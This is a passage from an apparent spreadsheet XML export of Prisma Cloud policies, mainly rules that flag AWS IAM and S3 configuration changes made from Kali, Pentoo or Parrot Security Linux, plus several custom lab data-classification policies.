          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2651" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2651" s="2" t="inlineStr"/>
      <c r="D2651" t="inlineStr"/>
      <c r="E2651" t="inlineStr"/>
      <c r="F2651" t="inlineStr"/>
      <c r="G2651" t="b">
        <v>1</v>
      </c>
      <c r="H26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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2651" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2651" t="inlineStr">
        <is>
          <t>AWS IAM configuration updates invoked from Kali Linux machine</t>
        </is>
      </c>
      <c r="L2651" t="inlineStr"/>
      <c r="M2651" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2651" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2651" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2651" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2651" t="inlineStr">
        <is>
          <t>3.1 Audit</t>
        </is>
      </c>
      <c r="R2651" t="inlineStr">
        <is>
          <t>3.1.1 Audit - All</t>
        </is>
      </c>
      <c r="S2651" t="inlineStr"/>
      <c r="T2651" t="b">
        <v>0</v>
      </c>
      <c r="U2651" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2651" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2651" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM configuration updates invoked from the Kali Linux machine. IAM Configuration changes such as creating, deleting users/groups, or modifying policies are triggered from Kali Linux by IAM API calls using credentials that belong to your AWS account. Kali Linux is a popular penetration testing tool that security professionals use to identify weaknesses in unpatched instances. Attackers might use this tool to find configuration weaknesses and gain unauthorized access to your AWS environment.</t>
        </is>
      </c>
      <c r="X2651"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1" t="inlineStr"/>
      <c r="Z2651" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.service = 'iam.amazonaws.com' AND json.rule = $.userAgent contains 'kali'</t>
        </is>
      </c>
      <c r="AA2651" t="inlineStr">
        <is>
          <t>Srikanth Makineni</t>
        </is>
      </c>
      <c r="AB2651" t="inlineStr">
        <is>
          <t>2023-09-26 19:31:47</t>
        </is>
      </c>
      <c r="AC2651" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-686</t>
        </is>
      </c>
      <c r="AD2651" t="b">
        <v>1</v>
      </c>
      <c r="AE2651" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2651" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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1" t="inlineStr">
        <is>
          <t>89f0fa30-9ac4-4436-82ac-91da81b5fe4b</t>
        </is>
      </c>
      <c r="AI2651" t="inlineStr">
        <is>
          <t>fe3f87f1-f048-416b-9b25-89b5acf28428</t>
        </is>
      </c>
      <c r="AJ2651" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2651" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2652">
      <c r="A2652" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2652" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2652" s="2" t="inlineStr"/>
      <c r="D2652" t="inlineStr"/>
      <c r="E2652" t="inlineStr"/>
      <c r="F2652" t="inlineStr"/>
      <c r="G2652" t="b">
        <v>1</v>
      </c>
      <c r="H26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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2652" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2652" t="inlineStr">
        <is>
          <t>AWS IAM configuration updates invoked from Pentoo Linux machine</t>
        </is>
      </c>
      <c r="L2652" t="inlineStr"/>
      <c r="M2652" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2652" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2652" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2652" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2652" t="inlineStr">
        <is>
          <t>3.1 Audit</t>
        </is>
      </c>
      <c r="R2652" t="inlineStr">
        <is>
          <t>3.1.1 Audit - All</t>
        </is>
      </c>
      <c r="S2652" t="inlineStr"/>
      <c r="T2652" t="b">
        <v>0</v>
      </c>
      <c r="U2652" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2652" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2652" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM configuration updates invoked from the Pentoo Linux machine. IAM Configuration changes such as creating, deleting users/groups, or modifying policies are triggered from Pentoo Linux by IAM API calls using credentials that belong to your AWS account. Pentoo Linux is a popular penetration testing tool that security professionals use to identify weaknesses in unpatched instances. Attackers might use this tool to find configuration weaknesses and gain unauthorized access to your AWS environment.</t>
        </is>
      </c>
      <c r="X2652"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2" t="inlineStr"/>
      <c r="Z2652" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.service = 'iam.amazonaws.com' AND json.rule = $.userAgent contains 'pentoo'</t>
        </is>
      </c>
      <c r="AA2652" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2652" t="inlineStr">
        <is>
          <t>2023-07-20 17:51:42</t>
        </is>
      </c>
      <c r="AC2652" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-688</t>
        </is>
      </c>
      <c r="AD2652" t="b">
        <v>1</v>
      </c>
      <c r="AE2652" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2652" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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2" t="inlineStr">
        <is>
          <t>607ede4c-f159-441c-aa20-be249b185361</t>
        </is>
      </c>
      <c r="AI2652" t="inlineStr">
        <is>
          <t>023498a0-741c-4c87-a156-194dae2fac08</t>
        </is>
      </c>
      <c r="AJ2652" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2652" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2653">
      <c r="A2653" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B2653" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2653" s="2" t="inlineStr"/>
      <c r="D2653" t="inlineStr"/>
      <c r="E2653" t="inlineStr"/>
      <c r="F2653" t="inlineStr"/>
      <c r="G2653" t="b">
        <v>1</v>
      </c>
      <c r="H26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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2653" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2653" t="inlineStr">
        <is>
          <t>AWS S3 configuration updates invoked from Kali Linux machine</t>
        </is>
      </c>
      <c r="L2653" t="inlineStr"/>
      <c r="M2653" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2653" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2653" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2653" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2653" t="inlineStr">
        <is>
          <t>3.1 Audit</t>
        </is>
      </c>
      <c r="R2653" t="inlineStr">
        <is>
          <t>3.1.1 Audit - All</t>
        </is>
      </c>
      <c r="S2653" t="inlineStr"/>
      <c r="T2653" t="b">
        <v>0</v>
      </c>
      <c r="U2653" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2653" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2653" t="inlineStr">
        <is>
          <t>This policy identifies AWS configuration updates invoked from the Kali Linux machine. S3 Configuration changes such as creating, deleting, or modifying bucket policies are triggered from Kali Linux by S3 API calls using credentials that belong to your AWS account. Kali Linux is a popular penetration testing tool that security professionals use to identify weaknesses in unpatched instances. Attackers might use this tool to find configuration weaknesses and gain unauthorized access to your AWS environment.</t>
        </is>
      </c>
      <c r="X2653"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3" t="inlineStr"/>
      <c r="Z2653" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.service = 's3.amazonaws.com' AND json.rule = $.userAgent contains 'kali'</t>
        </is>
      </c>
      <c r="AA2653" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2653" t="inlineStr">
        <is>
          <t>2023-07-20 17:51:13</t>
        </is>
      </c>
      <c r="AC2653" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-666</t>
        </is>
      </c>
      <c r="AD2653" t="b">
        <v>1</v>
      </c>
      <c r="AE2653" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2653" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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3" t="inlineStr">
        <is>
          <t>905a4fb7-97ed-4e2b-8fe0-7ac3baaab70f</t>
        </is>
      </c>
      <c r="AI2653" t="inlineStr">
        <is>
          <t>80c9dff1-69d2-42fb-aa34-9209634778e9</t>
        </is>
      </c>
      <c r="AJ2653" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2653" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2654">
      <c r="A2654" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B2654" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2654" s="2" t="inlineStr"/>
      <c r="D2654" t="inlineStr"/>
      <c r="E2654" t="inlineStr"/>
      <c r="F2654" t="inlineStr"/>
      <c r="G2654" t="b">
        <v>1</v>
      </c>
      <c r="H26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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2654" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2654" t="inlineStr">
        <is>
          <t>AWS S3 configuration updates invoked from Pentoo Linux machine</t>
        </is>
      </c>
      <c r="L2654" t="inlineStr"/>
      <c r="M2654" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2654" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2654" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2654" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2654" t="inlineStr">
        <is>
          <t>3.1 Audit</t>
        </is>
      </c>
      <c r="R2654" t="inlineStr">
        <is>
          <t>3.1.1 Audit - All</t>
        </is>
      </c>
      <c r="S2654" t="inlineStr"/>
      <c r="T2654" t="b">
        <v>0</v>
      </c>
      <c r="U2654" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2654" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2654" t="inlineStr">
        <is>
          <t>This policy identifies AWS configuration updates invoked from the Pentoo Linux machine. S3 Configuration changes such as creating, deleting, or modifying bucket policies are triggered from Pentoo Linux by S3 API calls using credentials that belong to your AWS account. Pentoo Linux is a popular penetration testing tool that security professionals use to identify weaknesses in unpatched instances. Attackers might use this tool to find configuration weaknesses and gain unauthorized access to your AWS environment.</t>
        </is>
      </c>
      <c r="X2654"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4" t="inlineStr"/>
      <c r="Z2654" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.service = 's3.amazonaws.com' AND json.rule = $.userAgent contains 'pentoo'</t>
        </is>
      </c>
      <c r="AA2654" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2654" t="inlineStr">
        <is>
          <t>2023-07-20 17:47:49</t>
        </is>
      </c>
      <c r="AC2654" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-668</t>
        </is>
      </c>
      <c r="AD2654" t="b">
        <v>1</v>
      </c>
      <c r="AE2654" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2654" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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4" t="inlineStr">
        <is>
          <t>c07eb38a-891a-46a6-84b6-1008d128f50a</t>
        </is>
      </c>
      <c r="AI2654" t="inlineStr">
        <is>
          <t>f9365696-3f00-4d97-81b8-b1042d74e76a</t>
        </is>
      </c>
      <c r="AJ2654" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2654" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2655">
      <c r="A2655" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B2655" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2655" s="2" t="inlineStr"/>
      <c r="D2655" t="inlineStr"/>
      <c r="E2655" t="inlineStr"/>
      <c r="F2655" t="inlineStr"/>
      <c r="G2655" t="b">
        <v>1</v>
      </c>
      <c r="H26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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2655" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2655" t="inlineStr">
        <is>
          <t>AWS S3 configuration updates invoked from Parrot Security Linux machine</t>
        </is>
      </c>
      <c r="L2655" t="inlineStr"/>
      <c r="M2655" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2655" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2655" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2655" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2655" t="inlineStr">
        <is>
          <t>3.1 Audit</t>
        </is>
      </c>
      <c r="R2655" t="inlineStr">
        <is>
          <t>3.1.1 Audit - All</t>
        </is>
      </c>
      <c r="S2655" t="inlineStr"/>
      <c r="T2655" t="b">
        <v>0</v>
      </c>
      <c r="U2655" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2655" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2655" t="inlineStr">
        <is>
          <t>This policy identifies AWS configuration updates invoked from the Parrot Security Linux machine. S3 Configuration changes such as creating, deleting, or modifying bucket policies are triggered from Parrot Security Linux by S3 API calls using credentials that belong to your AWS account. Parrot Security Linux is a popular penetration testing tool that security professionals use to identify weaknesses in unpatched instances. Attackers might use this tool to find configuration weaknesses and gain unauthorized access to your AWS environment.</t>
        </is>
      </c>
      <c r="X2655" t="inlineStr">
        <is>
          <t>1. Log in to AWS Console and make sure that the user indeed had the permissions to make the changes to the configuration that were reported.
2. Make sure that the configuration changes do not put the cloud resources in a vulnerable state.
3. If the user/entity was not supposed to perform the reported changes, make sure that the policies are modified such that the only user/entity has minimal permissions to perform normal job function.</t>
        </is>
      </c>
      <c r="Y2655" t="inlineStr"/>
      <c r="Z2655" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.service = 's3.amazonaws.com' AND json.rule = $.userAgent contains 'parrot'</t>
        </is>
      </c>
      <c r="AA2655" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2655" t="inlineStr">
        <is>
          <t>2023-07-20 17:48:25</t>
        </is>
      </c>
      <c r="AC2655" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-667</t>
        </is>
      </c>
      <c r="AD2655" t="b">
        <v>1</v>
      </c>
      <c r="AE2655" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2655" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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5" t="inlineStr">
        <is>
          <t>2a525056-499b-4105-a7ef-b0e60f6fd91b</t>
        </is>
      </c>
      <c r="AI2655" t="inlineStr">
        <is>
          <t>4c7a9321-8b50-4cce-9ba6-b10830b09402</t>
        </is>
      </c>
      <c r="AJ2655" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2655" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2656">
      <c r="A2656" t="inlineStr"/>
      <c r="B2656" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2656" s="2" t="inlineStr"/>
      <c r="D2656" t="inlineStr"/>
      <c r="E2656" t="inlineStr"/>
      <c r="F2656" t="inlineStr"/>
      <c r="G2656" t="b">
        <v>0</v>
      </c>
      <c r="H26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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2656" t="inlineStr">
        <is>
          <t>data_classification_data</t>
        </is>
      </c>
      <c r="K2656" t="inlineStr">
        <is>
          <t>data-policy-vstoyko-00</t>
        </is>
      </c>
      <c r="L2656" t="inlineStr"/>
      <c r="M2656" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2656" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2656" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="P2656" t="inlineStr">
        <is>
          <t>data_classification</t>
        </is>
      </c>
      <c r="Q2656" t="inlineStr"/>
      <c r="R2656" t="inlineStr"/>
      <c r="S2656" t="inlineStr">
        <is>
          <t>NW Test1</t>
        </is>
      </c>
      <c r="T2656" t="b">
        <v>0</v>
      </c>
      <c r="U2656" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2656" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="W2656" t="inlineStr"/>
      <c r="X2656" t="inlineStr"/>
      <c r="Y2656" t="inlineStr"/>
      <c r="Z2656" t="inlineStr"/>
      <c r="AA2656" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2656" t="inlineStr">
        <is>
          <t>2024-09-13 16:52:05</t>
        </is>
      </c>
      <c r="AC2656" t="inlineStr"/>
      <c r="AD2656" t="b">
        <v>0</v>
      </c>
      <c r="AE2656" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2656" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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6" t="inlineStr">
        <is>
          <t>93e450ec-11d7-48f8-8cb0-3178a0a358cd</t>
        </is>
      </c>
      <c r="AI2656" t="inlineStr"/>
      <c r="AJ2656" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK2656" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2657">
      <c r="A2657" t="inlineStr"/>
      <c r="B2657" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2657" s="2" t="inlineStr"/>
      <c r="D2657" t="inlineStr"/>
      <c r="E2657" t="inlineStr"/>
      <c r="F2657" t="inlineStr"/>
      <c r="G2657" t="b">
        <v>1</v>
      </c>
      <c r="H26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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2657" t="inlineStr">
        <is>
          <t>data_classification_data</t>
        </is>
      </c>
      <c r="K2657" t="inlineStr">
        <is>
          <t>llatorre-Canada</t>
        </is>
      </c>
      <c r="L2657" t="inlineStr"/>
      <c r="M2657" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2657" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2657" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="P2657" t="inlineStr">
        <is>
          <t>data_classification</t>
        </is>
      </c>
      <c r="Q2657" t="inlineStr"/>
      <c r="R2657" t="inlineStr"/>
      <c r="S2657" t="inlineStr"/>
      <c r="T2657" t="b">
        <v>0</v>
      </c>
      <c r="U2657" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2657" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="W2657" t="inlineStr"/>
      <c r="X2657" t="inlineStr"/>
      <c r="Y2657" t="inlineStr"/>
      <c r="Z2657" t="inlineStr"/>
      <c r="AA2657" t="inlineStr">
        <is>
          <t>Luis Latorre</t>
        </is>
      </c>
      <c r="AB2657" t="inlineStr">
        <is>
          <t>2023-10-05 17:34:28</t>
        </is>
      </c>
      <c r="AC2657" t="inlineStr"/>
      <c r="AD2657" t="b">
        <v>0</v>
      </c>
      <c r="AE2657" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2657" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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7" t="inlineStr">
        <is>
          <t>1f1c1fb3-ecfb-4c7e-a554-ebbbd089d318</t>
        </is>
      </c>
      <c r="AI2657" t="inlineStr"/>
      <c r="AJ2657" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK2657" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2658">
      <c r="A2658" t="inlineStr"/>
      <c r="B2658" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2658" s="2" t="inlineStr"/>
      <c r="D2658" t="inlineStr"/>
      <c r="E2658" t="inlineStr"/>
      <c r="F2658" t="inlineStr"/>
      <c r="G2658" t="b">
        <v>0</v>
      </c>
      <c r="H2658" t="inlineStr">
        <is>
          <t>ALERT ALL test, Audit jmontufar, Azure AKS cluster Azure CNI networking not enabled, AzureDriftDetection, BG-AH-Email-Test, BPtestTag, Critical Misconfigs to ServiceNow, DM_TEST,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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2658" t="inlineStr">
        <is>
          <t>data_classification_data</t>
        </is>
      </c>
      <c r="K2658" t="inlineStr">
        <is>
          <t>dl-smakinen</t>
        </is>
      </c>
      <c r="L2658" t="inlineStr"/>
      <c r="M2658" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2658" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2658" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="P2658" t="inlineStr">
        <is>
          <t>data_classification</t>
        </is>
      </c>
      <c r="Q2658" t="inlineStr"/>
      <c r="R2658" t="inlineStr"/>
      <c r="S2658" t="inlineStr"/>
      <c r="T2658" t="b">
        <v>0</v>
      </c>
      <c r="U2658" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2658" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="W2658" t="inlineStr"/>
      <c r="X2658" t="inlineStr"/>
      <c r="Y2658" t="inlineStr"/>
      <c r="Z2658" t="inlineStr"/>
      <c r="AA2658" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2658" t="inlineStr">
        <is>
          <t>2024-09-13 17:11:27</t>
        </is>
      </c>
      <c r="AC2658" t="inlineStr"/>
      <c r="AD2658" t="b">
        <v>0</v>
      </c>
      <c r="AE2658" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2658" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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 - Notifications:email, AccountGroups:DM_TEST_NEW;,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8" t="inlineStr">
        <is>
          <t>4e33aa0b-8a7e-4339-ae54-21377df0d944</t>
        </is>
      </c>
      <c r="AI2658" t="inlineStr"/>
      <c r="AJ2658" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK2658" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2659">
      <c r="A2659" t="inlineStr"/>
      <c r="B2659" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2659" s="2" t="inlineStr"/>
      <c r="D2659" t="inlineStr"/>
      <c r="E2659" t="inlineStr"/>
      <c r="F2659" t="inlineStr"/>
      <c r="G2659" t="b">
        <v>0</v>
      </c>
      <c r="H26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59" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2659" t="inlineStr">
        <is>
          <t>data_classification_data</t>
        </is>
      </c>
      <c r="K2659" t="inlineStr">
        <is>
          <t>St data</t>
        </is>
      </c>
      <c r="L2659" t="inlineStr"/>
      <c r="M2659" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2659" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2659" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="P2659" t="inlineStr">
        <is>
          <t>data_classification</t>
        </is>
      </c>
      <c r="Q2659" t="inlineStr"/>
      <c r="R2659" t="inlineStr"/>
      <c r="S2659" t="inlineStr"/>
      <c r="T2659" t="b">
        <v>0</v>
      </c>
      <c r="U2659" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2659" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="W2659" t="inlineStr"/>
      <c r="X2659" t="inlineStr"/>
      <c r="Y2659" t="inlineStr"/>
      <c r="Z2659" t="inlineStr"/>
      <c r="AA2659" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2659" t="inlineStr">
        <is>
          <t>2024-09-13 17:14:01</t>
        </is>
      </c>
      <c r="AC2659" t="inlineStr"/>
      <c r="AD2659" t="b">
        <v>0</v>
      </c>
      <c r="AE2659" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2659" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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59" t="inlineStr">
        <is>
          <t>8f43e520-2b48-4ef2-8f20-3f2bf4fbd518</t>
        </is>
      </c>
      <c r="AI2659" t="inlineStr"/>
      <c r="AJ2659" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK2659" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2660">
      <c r="A2660" t="inlineStr"/>
      <c r="B2660" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2660" s="2" t="inlineStr"/>
      <c r="D2660" t="inlineStr"/>
      <c r="E2660" t="inlineStr"/>
      <c r="F2660" t="inlineStr"/>
      <c r="G2660" t="b">
        <v>0</v>
      </c>
      <c r="H26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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2660" t="inlineStr">
        <is>
          <t>data_classification_data</t>
        </is>
      </c>
      <c r="K2660" t="inlineStr">
        <is>
          <t>JamesTest</t>
        </is>
      </c>
      <c r="L2660" t="inlineStr"/>
      <c r="M2660" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2660" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2660" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="P2660" t="inlineStr">
        <is>
          <t>data_classification</t>
        </is>
      </c>
      <c r="Q2660" t="inlineStr"/>
      <c r="R2660" t="inlineStr"/>
      <c r="S2660" t="inlineStr"/>
      <c r="T2660" t="b">
        <v>0</v>
      </c>
      <c r="U2660" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2660" t="inlineStr">
